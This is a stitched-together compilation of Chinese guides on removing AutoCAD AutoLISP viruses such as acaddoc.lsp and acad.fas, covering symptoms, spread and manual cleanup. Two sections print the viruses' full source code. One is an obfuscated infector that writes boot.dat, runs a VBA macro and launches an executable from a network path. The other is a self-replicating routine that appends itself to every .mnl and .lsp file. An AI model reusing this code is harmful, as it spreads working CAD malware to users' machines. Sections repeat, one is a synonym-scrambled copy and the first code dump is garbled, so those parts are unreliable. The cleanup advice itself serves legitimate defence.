acaddoc(整理).lsp病毒文件彻底清除方法.pptx

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

常见AutoCAD病毒（acad.fas、acad.lsp）清除⽅法常见AutoCAD病毒(acad.fas、acad.lsp)清除⽅法acad.fas、acad.lsp这两种病毒是最常见的CAD病毒了，⽽且往往同⼀时候出现。

因为其本⾝对系统并不具备危害性，不过恶作剧程序罢了，因此⼤多数防病毒软件对它们不起作⽤，以下介绍⼿动删除⽅法。

第⼀步：查找硬盘、U盘内的 acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个⽂件并删除⼲净（查找前请将显⽰隐藏和系统⽂件打开，这五个⽂件不⼀定同⼀时候出现。

强烈建议使⽤Total Commander⽂件管理器查找）。

第⼆步：查找acad.mnl⽂件（这个⽂件通常有两个，⼀个在“c:/Program Files/AutoCAD****/UserDataCache/Support/”⽬录下，还有⼀个在“c:/Documents and Settings/你的username/Application Data/Autodesk/AutoCAD****/R****/chs/Support/”⽬录下。

眼下病毒仅改动第⼀个acad.mnl⽂件）。

打开acad.mnl⽂件，在⽂件末尾找到下⾯三个语句的组合并删除（这三个语句组合不⼀定同⼀时候出现），然后保存⽂件。

(if (null stol) (load "lcm" ""))(princ)(load "acadapp.lsp")(princ)(load "acadappp.lsp")(princ)附录：有关该CAD病毒 acad.fas 的说明：1.它对电脑是没有随意的危害性！2.它在8:00到18:00这段时间,对CAD没有不论什么影响的!它的副作⽤就是：你的CAD在启动时会弹出⼀个显⽰时间的对话框假设时间不在8:00⾄18:00之间，还有可能伴随"移动"命令改变等情况。

acaddoc.lsp病毒文件彻底清除方法(2012-05-20 23:33:17)转载▼分类：电脑知识标签：杂谈前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp 的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD 开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

方法一acaddoc.lsp输入的列表有缺陷（转自LOVE空间）2009年04月07日星期二上午 11:14这个是个新病毒，用以往的解决方法（ 1.lps改名为acaddoc.lsp替换）无法解决，在网络搜索了一下看到百度空间有个帖子有相关解决办法。

原帖如下：今天在Q群里又见网友请求删除CAD病毒，说用专杀工具也无法解决，于是让他把病毒文件传了给我。

打开文件一看，发现这个“acaddoc.lsp”文件内的程序代码跟以往的“acaddoc.lsp”病毒文件不同。

该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。

将病毒代码（“acaddoc.lsp”文件内容）写入“*.lsp”文件内，并在“*.mnl”文件中写入“*.lsp”文件的加载路径。

同时，直线命令“line”、外部参照管理命令“xref”和分解（炸开）命令“explode”无法使用。

CAD系统感染该病毒文件后，只是简单搜索删除“acaddoc.lsp”文件，不能清除病毒。

因为所有的“*.lsp”文件已经被修改，所有“*.lsp”文件都是病毒文件。

解决方法壹：①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）后，重新安装CAD解决方法贰：①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑，复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件（包括C盘用户目录内的相关文件）预防CAD病毒：装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，可以减少中毒的机率。

（此法99.999%有效）附：×××\Application Data\Autodesk\AutoCAD 200×\R×.×\ 其中×××是你登录系统时的用户名， 200×和R×.×分别是CAD的版本和版本代号。

你是不是每次打开CAD，都会在文件目录中产生一个acad.lsp文件？
如果不是，你没必要再看下去了
如果是，那么恭喜你，中奖啦！请接着往下看。

很多CAD用户都出现了同一问题，即打开了一些从网上下载的或从其他地方拷贝过来的图纸后，CAD开始变的非常慢，通常打开一张图纸要等待几分钟的时间，并且一些运行于CAD上的二次开发软件的命令变的不可用。

即使重新安装CAD甚至重新安装系统，只要再次打开以前打开过的图纸，问题重现，这个问题对许多CAD设计人员都造成相当大的困扰。

该病毒利用CAD的读取机制，在用户第一次打开从网上下载的带有病毒的图纸后，该病毒即悄悄运行，并感染每一张新打开的图纸，将病毒文件到处复制，并生成很多名为acad.lsp的程序，使得CAD打开很慢，部分快捷命令被修改，而且每次打开CAD，都会在文件目录中产生一个acad.lsp文件？即便是重装CAD甚至重装系统都不能解决问题。

解决方法：0.0
1. 先将CAD程序卸载，记得要卸载干净。

2. 打开【我的电脑】，按F3，搜索硬盘上所有【acad.lsp】和【acadapp.lsp】把搜索到的文件全部全部删除。

注：搜索时必须选择高级选项
3. 从新安装CAD就OK了！
CAD技术交流群： 38600958。

序止: 迩去自己公司里流通一种CAD病毒，中毒后，CAD屡屡新启图均死成一个acaddoc.lsp的病毒文献，之阳早格格创做虽损害力没有大，但是烦没有堪烦.经钻研病毒源码后，摸索出了一套扫除该病毒的办法.而后通过正在数个共事呆板上考证，该要领止之灵验.于是将杀毒要领成文，群收给部分共事，以下是本文.一病毒简介:迩去公司里流传一种cad病毒.该病毒可被卡巴斯基战360杀毒硬件查出.卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒硬件查出病毒名为Trojan.Script.29327.遗憾的是，卡巴斯基战360杀毒硬件均没有克没有及将其实足扫除.二中毒症状：呆板中毒后，运止CAD时，每挨启一个dwg文献，均正在dwg文献地圆目录下死成一个acaddoc.lsp的文献.由于屡屡启图，病毒步调均举止一次病毒传播复造历程，果此使得CAD启图时速度变缓.用记事本查看CAD拆置路径下的support目录下的任一*.lsp文献，如文献开端含有与附件1相共的代码，则可判决为中毒.三传播机理：通太过解病毒的源代码，收端相识其传播机理如下：如呆板已中毒，CAD新挨启dwg文献时，病毒步调自动加载.并搜索CAD处事目录下的acad.mnl文献，熏染共一目录下的*.mnl文献，搜索acad的support目录，并熏染该目录下的所有*.lsp文献.共时病毒正在目前挨启的dwg文献地圆目录下死成acaddoc.lsp文献，以好处下次传播.如本机已中毒，而新挨启的dwg文献地圆目录下有acaddoc.lsp文献，则病毒将熏染上述目录下的*.mnl与*.lsp 文献.该病毒的最后脚段是调用acadapq 与 acadappp 二个非法步调.至于那二个步调会搞什么，久已深进钻研.四扫除步调：1. 退出CAD.2. 齐盘搜索acadapq.*、、acadappp.*、acaddoc.* 文献，而后实足简略上述文献.注意查找前正在文献夹选项中树立“隐现所有文献与文献夹”以及与消“隐躲受呵护的支配系统文献”.搜索时采用“查找所有文献及文献夹”，而后正在“下档选项”里勾选“搜索系统文献夹”“搜索隐躲的文献战文献夹”“搜索子文献夹”.如果搜出的文献无法简略，则先浑空回支站，再搜索简略.注：探索者目录下有个AcadDoc.lsp（注意大小写）没有是病毒文献，谨防误删.3. 查看C盘根目录下是可有boot.dat文献，如有，则将其简略.4. 加进C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 2006（或者AutoCAD2004）\R16.2\chs\Support目录，用记事本挨启该目录下的所有*.mnl文献，脚动简略与附件1相共的代码（普遍皆正在文献开端），而后保存.并将建改后的所有*.mnl文献属性树立为“只读”.5. 加进CAD拆置目录下的support目录，将该目录下的所有*.lsp文献按步调4要领处理.记得将其属性设为“只读”.6. 如果本机拆置有多个版本的CAD，皆需按上述步调查看一次.如按上述步调扫除病毒乐成，没有要开尔，得先感动国家.如已乐成，再去找尔.五防止步伐：由于该病毒是通过读与dwg文献地圆的目录下acaddoc.lsp去传播的.果为正在交受其余共事的文献夹时，应先查看该文献夹中是可包罗上述病毒文献.如有，则简略之.共时也该当保证传给其余共事的文献夹没有要包罗上述文献.病毒会熏染support目录下的 *.lsp文献.果此提议新建一个文献夹，将时常使用的lisp步调搁置正在该文献夹下，共时正在CAD选项中将其树立为处事搜索目录.已拆杀毒硬件的呆板应最先将杀毒硬件拆上（360杀毒硬件免费的），正在交受他人传去的文献后应最先杀毒.提议没有要曲交挨启大众盘上的dwg文献，应先下载到本机再挨启.－－尖锐的分隔线－－上文中所道的样本文献里所含代码即一段以“(setq flagx t)(setq bz "(setq flagx t)")”启头，以“(load "acadapq")(princ)(load "acadappp.lsp")(princ)”末端的代码，很佳辨识，中招的共教无妨一试.。

手工删除CAD病毒文件的方法
1.先关掉CAD，然后打开下面路径下的搜索软件（可以ctrl+单击）
\\192.168.10.253\projects\0000文件中转站\SF\Everything文件搜索工具\Everything_x64.exe
2.点“书签”
3.里面有我做好的记录，分别选择搜索”acad.fas” “acaddoc.lsp“”acaddoc.lsp_bak“三个文件，
然后选中，按“delete”键删除。

注：文件夹除外，文件夹是用来免疫的，防止病毒再复制到该文件夹下的，利用的原理就是不能有两个相同文件名的文件同时存在于同一个文件夹下。

4.务必每个人的电脑都做如上操作一次。

如果有文件删不掉或不清楚操作，联系我。

5.操作完之后，右下角有个图标，点右键，退出.
江增源
2015.12.08
2015.12.17更新
1.最近又发现了一个新的病毒文件，文件名为“acad.lsp”，删除方法同上，搜到的文件只要是文件名名字完全匹配的，都删除掉就可以。

2.这个病毒的发作特征就是打开CAD会弹出一个空白的窗口出来。

江增源
2015.12.17。

一种CAD病毒的清除与防范措施雪山飞猪 QQ534455近来又出现一种AutoCAD病毒，该病毒与以往CAD病毒不同。

干净的CAD 系统当打开DWG图时，如果该图所在目录下有ACADDOC.LSP文件（基本为病毒传播文件），ACADDOC.LSP就会运行。

1.病毒的特征与传播方式我们先看看病毒代码，代码如下：(setq flagx t)(setq bz "(setq flagx t)")(defun app(source target bz / flag flag1 wjm wjm1 text)(setq flag nil)(setq flag1 t)(if (findfile target)(progn(setq wjm1 (open target "r"))(while (setq text (read-line wjm1))(if (= text bz) (setq flag1 nil)));while(close wjm1));progn);if(if flag1(progn(setq wjm (open source "r"))(setq wjm1 (open target "a"))(write-line (chr 13) wjm1)(while (setq text (read-line wjm))(if (= text bz) (setq flag t))(if flag(progn(write-line text wjm1));progn);if);while(close wjm1)(close wjm));progn);if);defun(setvar "cmdecho" 0)(setq acadmnl (findfile "acad.mnl"))(setq acadmnlpath (vl-filename-directory acadmnl))(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))(setq acadexe (findfile "acad.exe"))(setq acadpath (vl-filename-directory acadexe))(setq support (strcat acadpath "\\support"))(setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist))(setq dwgname (getvar "dwgname"))(setq dwgpath (findfile dwgname))(if dwgpath(progn(setq acaddocpath (vl-filename-directory dwgpath))(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(app mnlfilename acaddocfile bz)(app acaddocfile mnlfilename bz)(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))(app lspfilename acaddocfile bz)(app acaddocfile lspfilename bz)(setq lspn (1+ lspn)));while);progn);if(setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app mnlfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app mnlfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist))) (setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app lspfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app lspfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn (1+ lspn))(load "acadapq")(princ)(load "acadapp")(princ)(load "acadapq")(princ)病毒代码运行后，首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。

acaddoc.lsp病毒解决方案（本人经试验成功解决）现在好多朋友从别的机器拷贝图纸会带过来一种acaddoc.lsp病毒，具体症状为：1.每次打开DWG图纸，在图纸文件夹中会产生acaddoc.lsp文件，文件大小约为3528KB；2.每次打开AUTOCAD，无论任何图纸，在命令行前几行中都会出现配置表有缺陷，经常会出现三个，且无论打开什么图纸，软件打开速度特别慢，一般会在两分钟以上。

解决方法请按如下步骤（详述，如果电脑知识过关可直接做到每项小标题内容即可）：1.删除当前电脑中所有acaddoc.lsp文件打开‘我的电脑’→‘搜索’→搜索内容‘acaddoc.lsp’,最好打开高级选项中的搜索隐藏文件等小选项→全选搜索完成界面的该文件，删除→退出搜索即可；2.卸载当前AUTOCAD软件（并手工删除‘C:\Documents and Settings\Ad ministrator\Application Data\Autodesk’路径中的所有文件夹）使用3 60安全卫士等第三方软件卸载当前已经安装的AUTOCAD软件，因为我用系统自带卸载程序总是无法卸载被病毒感染的几个文件造成卸载失败，我们卸载软件的目的是彻底删除染毒文件，因为我们大部分人不会一个一个去找到这些文件并修复，不如重装一次节省时间；3.重装AUTOCAD软件（最好从压缩包中重新释放安装软件）该处没有特别的地方，大家按安装程序中的说明重装即可，唯一需要注意的就是安装程序一定要保证是无毒的，所以我才会特别注明要从压缩包中重新释放一次安装软件；4.预防再次染毒（此步骤我没有进行实践验证，只是参考当前网上的一些说明，为了保险，我对网上的说明进行了扩大范围处理）项目1：C:\Documents and Settings\Administrator\Application D ata\Autodesk\AutoCAD 2007\R17.0\chs目录下的SUPPORT文件夹（包括子文件夹）设置为只读；项目2：*:\******\AutoCAD 2007目录下的SUPPORT文件夹（包括子文件夹）设置为只读，‘*’为AUTOCAD主文件安装路径；重装了三次才找到这四个步骤，尽量按上面特别注明的要求来，因为第二次重装时曾遇到“正在重生成模型。